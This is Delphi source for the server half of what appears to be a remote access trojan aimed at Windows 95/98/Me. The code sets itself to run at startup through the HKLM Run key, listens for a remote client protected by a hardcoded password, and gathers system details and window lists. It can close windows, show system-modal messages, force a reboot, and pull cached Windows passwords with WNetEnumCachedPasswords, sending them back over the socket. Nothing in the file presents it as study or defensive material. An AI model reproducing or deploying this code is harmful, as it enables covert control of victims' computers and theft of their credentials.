unit ServerUnit;

interface

uses
  Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs,
  ScktComp, ComCtrls, StdCtrls, Registry, Psock, Sockets;

  type
 PWinPassword = ^TWinPassword;
 TWinPassword = record
   EntrySize: Word;
   ResourceSize: Word; //length of username
   PasswordSize: Word; //length of password
   EntryIndex: Byte;
   EntryType: Byte;
   PasswordC: Char;   //password string in OEM
  end;

type
  TForm1 = class(TForm)
    Server: TServerSocket;
    moInfo: TMemo;
    TcpServer1: TTcpServer;
    procedure FormCreate(Sender: TObject);
    procedure FormDestroy(Sender: TObject);
    procedure ServerClientConnect(Sender: TObject;
      Socket: TCustomWinSocket);
    procedure ServerClientDisconnect(Sender: TObject;
      Socket: TCustomWinSocket);
    procedure ServerClientRead(Sender: TObject; Socket: TCustomWinSocket);


  private
    { Private declarations }
  public
  { Public declarations }
  end;

var
  Form1: TForm1;
  passwords,command,data,data1,data2:string;
  PassCorrect:boolean;
  count:integer;


   function WnetEnumCachedPasswords
(lp: lpStr; w: Word; b: Byte; PC: PChar; dw: Dword): Word; stdcall;


  implementation

{$R *.DFM}






//Delay for debug------------------------------------------------------
procedure Delay(ms : longint);
var
TheTime : LongInt;
begin
TheTime := GetTickCount + ms;

while GetTickCount < TheTime do
Application.ProcessMessages;
end;


// System Message---------------------------------------------------------
Procedure SystemMessage(text:string;caption:string;flag:string);
var
i:integer;

begin

i:=StrToInt(flag);
case i of

0: Application.MessageBox(Pchar(text),Pchar(caption),MB_ICONWARNING+MB_SYSTEMMODAL);
1: Application.MessageBox(Pchar(text),Pchar(caption),MB_ICONERROR+MB_SYSTEMMODAL);
2: Application.MessageBox(Pchar(text),Pchar(caption),MB_ICONQUESTION+MB_SYSTEMMODAL);
3: Application.MessageBox(Pchar(text),Pchar(caption),MB_ICONINFORMATION+MB_SYSTEMMODAL);

end;


end;



// Separate Command and data---------------------------------
Procedure Translate(stroka:string);
var
j,i:integer;

begin
if Length(stroka)<=1 then exit;

    Command:='';
    Data:='';
    data1:='';
    data2:='';
    i:=1;

while (stroka[i]<>'%') do  // command
 begin
  command:=command+stroka[i];
  inc(i);
  if (i>length(stroka)) then Exit;
 end;

if i=Length(stroka) then   // if one command then exit
 begin
  data:='';
  data1:='';
  data2:='';
  Exit;
 end;

  inc(i);

while (stroka[i]<>'%') do  // data
 begin
  data:=data+stroka[i];
  inc(i);
  if (i>length(stroka)) then Exit;
 end;

 inc(i);

 while (stroka[i]<>'%') do  // data1
 begin
  data1:=data1+stroka[i];
  inc(i);
  if (i>length(stroka)) then Exit;
 end;

   inc(i);
   for j:=i to Length(stroka) do  //data2
   data2:=data2+stroka[j];

end;


//List of all active windows---------------------------------
Procedure GetList;
var
Wnd : hWnd;
buff: array [0..127] of Char;

begin

Form1.moInfo.Lines.Clear;
Wnd := GetWindow(Form1.Handle, gw_HWndFirst);
while Wnd <> 0 DO
 begin {H :}
  if (Wnd <> Application.Handle) and    {- }
     IsWindowVisible(Wnd) AND           {-H }
     (GetWindow(Wnd, gw_Owner) = 0) and {- }
     (GetWindowText(Wnd, buff, sizeof(buff)) <> 0)
  then
   begin
        GetWindowText(Wnd, buff, sizeof(buff));
        Form1.moInfo.Lines.Add(StrPas(buff));
   end;
  Wnd := GetWindow(Wnd, gw_hWndNext);
 end;
end;


//WindowsVersion detection ----------------------------------
Function WindowsVersion:string;
//Var Wver:string;
begin
 If (GetVersion() and $80000000)<>0 then

//  ...'Windows 95/98/Me'...
Result:='95/98/Me'
else
//   ... 'Windows NT/2000/XP'...
Result:='NT/2000/XP';
//WindowsVersion:=Wver;
end;


//===========================================================================
Procedure AutoRunFromRegistry;
var
R:TRegistry;

begin
 R:=TRegistry.Create;
 R.RootKey:=HKEY_LOCAL_MACHINE;
 R.OpenKey('Software\Microsoft\Windows\CurrentVersion\Run',false);

  if r.ValueExists('apranet') then Exit
   else R.WriteString('apranet',Application.ExeName);

   R.Free;
end;



//GetInfo ---------------------------------------------------
Procedure GetInfo;
var
     R:TRegistry;
   str:string;
     i:integer;
    ld:DWORD;

begin
Form1.moinfo.Lines.Clear;
        // false   p  

            str:=Form1.Server.Socket.LocalHost;
            Form1.moInfo.Lines.Add('LocalHost  '+str);
            form1.moInfo.lines.add('LocalIP    '+form1.TcpServer1.LocalHostAddr);

  str:='Software\Microsoft\Windows\CurrentVersion';
         R:=TRegistry.Create;
         R.RootKey:=HKEY_LOCAL_MACHINE;
         R.OpenKey(str,false);

         str:=R.ReadString('VersionNumber');
         Form1.moInfo.Lines.Add('VersionNumber  '+str);

          str:=R.ReadString('ProductName');
          Form1.moInfo.Lines.Add('ProductName  '+str);

           str:=R.ReadString('SystemRoot');
           Form1.moInfo.Lines.Add('SystemRoot  '+str);

            str:=R.ReadString('RegisteredOwner');
            Form1.moInfo.Lines.Add('RegisteredOwner  '+str);

             str:=R.ReadString('RegisteredOrganization');
             Form1.moInfo.Lines.Add('RegisteredOrganization  '+str);
            R.Free;

R:=TRegistry.Create;
R.RootKey:=HKEY_LOCAL_MACHINE;
str:='Hardware\Description\System\CentralProcessor\0';
R.OpenKey(str,false);

str:=R.ReadString('Identifier');
Form1.moInfo.Lines.Add('Processor  '+str);

 str:=R.ReadString('VendorIdentifier');
 Form1.moInfo.Lines.Add('VendorIdentifier  '+str);

  R.Free;
//begin
Form1.moInfo.Lines.Add('Logical drives :');
 ld := GetLogicalDrives;
  for i := 0 to 25 do
   begin
    if (ld and (1 shl i)) <> 0 then
    if GetDriveType(PChar(Char(Ord('A') + i) + ':\'))=DRIVE_FIXED then
    Form1.moInfo.Lines.Add('HDD '+Char(Ord('A') + i)+':\');
      if GetDriveType(PChar(Char(Ord('A') + i) + ':\'))=DRIVE_REMOVABLE then
      Form1.moInfo.Lines.Add('Floppy Disk  '+Char(Ord('A') + i)+':\');
              if GetDriveType(PChar(Char(Ord('A') + i) + ':\'))=DRIVE_CDROM then
              Form1.moInfo.Lines.Add('CD-Rom  '+Char(Ord('A') + i)+':\');

   end;

  end;



//=================================================================
function WnetEnumCachedPasswords
    (lp: lpStr;w: Word;b: Byte;PC: PChar;dw: DWord): Word;external mpr name 'WNetEnumCachedPasswords';


//==============================================================
function AddPassword(WinPassword: PWinPassword;dw: Dword): LongBool; stdcall;

var
   buffer: Array[0..255] of Char;
   str:string;
   i:integer;
begin
  inc(Count);

  Move(WinPassword.PasswordC, buffer, WinPassword.ResourceSize + WinPassword.PasswordSize);
   //login
   for i:=0 to WinPassword.ResourceSize-1 do
    if buffer[i] > chr(31) then str:=str+buffer[i];

  str:=str+' : ';

   //password
  for i:=WinPassword.ResourceSize to WinPassword.ResourceSize+WinPassword.PasswordSize-1 do
   if buffer[i] > chr(31) then str:=str+buffer[i];

    Result := True;

   passwords:=passwords+str+#13#10;
   //form1.Memo1.Lines.add(passwords);
  end;








// send info-------------------------------------------------
procedure SendInfo;
var
     i:integer;
   str:string;
begin
 for i:=0 to Form1.moInfo.Lines.Count do
  begin
   str:=Form1.moInfo.Lines[i];
   Form1.Server.Socket.Connections[0].SendText(str);
   Delay(50);//only for debug
  end;

end;



//=======================================================================
procedure GetCachedPasswords;


begin
//windowsversion:='NT/2000/XP';

 if WindowsVersion='NT/2000/XP' then
  begin
   form1.moInfo.lines.Clear;
   form1.moInfo.lines.add('PWL file not found :( ');
   SendInfo;
   Exit;
  end;
   

 form1.moinfo.lines.Clear;
 passwords:='';
 count:=0;
try
 WnetEnumCachedPasswords(nil,0,$FF,@AddPassword,0);

 finally

 if count=0 then form1.moinfo.lines.add('not found in cache  :(');

 form1.moinfo.Lines.add(passwords);

 SendInfo;
  end;
  
end;



// SystemDir=============================================================
Function WinDir:string;
var
  pWindowsDir : array [0..255] of Char;

begin
  GetWindowsDirectory (pWindowsDir, 255);
  Result := StrPas (pWindowsDir);
end;


// Kill Window-------------------------------------------------------
Procedure KillWindow(windowName:string);

var
  myhandle:Thandle;

begin
myhandle:=findwindow(nil,PChar(windowName));
if myhandle<>0 then

PostMessage(myhandle,wm_close,0,0);
PostMessage(myhandle,wm_quit,0,0);


end;


//System Reboot
Procedure SystemReboot;
begin
// Form1.Server.Close;
 ExitWindowsEx(EWX_FORCE+EWX_REBOOT,0);
//ExitWindows(EW_RESTARTWINDOWS, 0 );
end;


// server open-----------------------------------------------
procedure TForm1.FormCreate(Sender: TObject);
begin
 Server.Open;
   PassCorrect:=false;

AutoRunFromRegistry;

end;

// on exit server close--------------------------------------
procedure TForm1.FormDestroy(Sender: TObject);
begin
Server.Close;
end;


// esle client connected-------------------------------------
procedure TForm1.ServerClientConnect(Sender: TObject;
  Socket: TCustomWinSocket);

begin
// StatusBar1.SimpleText:='Connected...';
end;

// esle client disconnected----------------------------------
procedure TForm1.ServerClientDisconnect(Sender: TObject;
  Socket: TCustomWinSocket);
begin
PassCorrect:=False;
end;

//Check password-------------------------------------------------------
Procedure CheckPassword(password:string);

begin

if Not PassCorrect then
     begin
       if password<>'123' then
        begin
         Form1.Server.Socket.Disconnect(0);
         PassCorrect:=False;
         Exit;
        end;

       PassCorrect:=true;
     end;
end;



// command read----------------------------------------------
procedure TForm1.ServerClientRead(Sender: TObject;
  Socket: TCustomWinSocket);


 var
  str:string;
//    i:integer;

begin
    str:=Socket.ReceiveText;

// command and data//--------------------------

moInfo.Lines.Add(str);


Translate(str);

if command='password' then CheckPassword(data);


if command='info' then begin GetInfo; //info-------------
                             SendInfo;
                       end;

if command='list' then begin GetList; //List-------------
                             SendInfo;
                       end;

if command='kill' then KillWindow(data); //Kill window

if command='message' then SystemMessage(data,data1,data2);// system message

if command='reboot' then SystemReboot; // reboot (only 95/98/me)

if command='getcachedpasswords' then GetCachedPasswords;//Get Cached Passwords
end;







end.
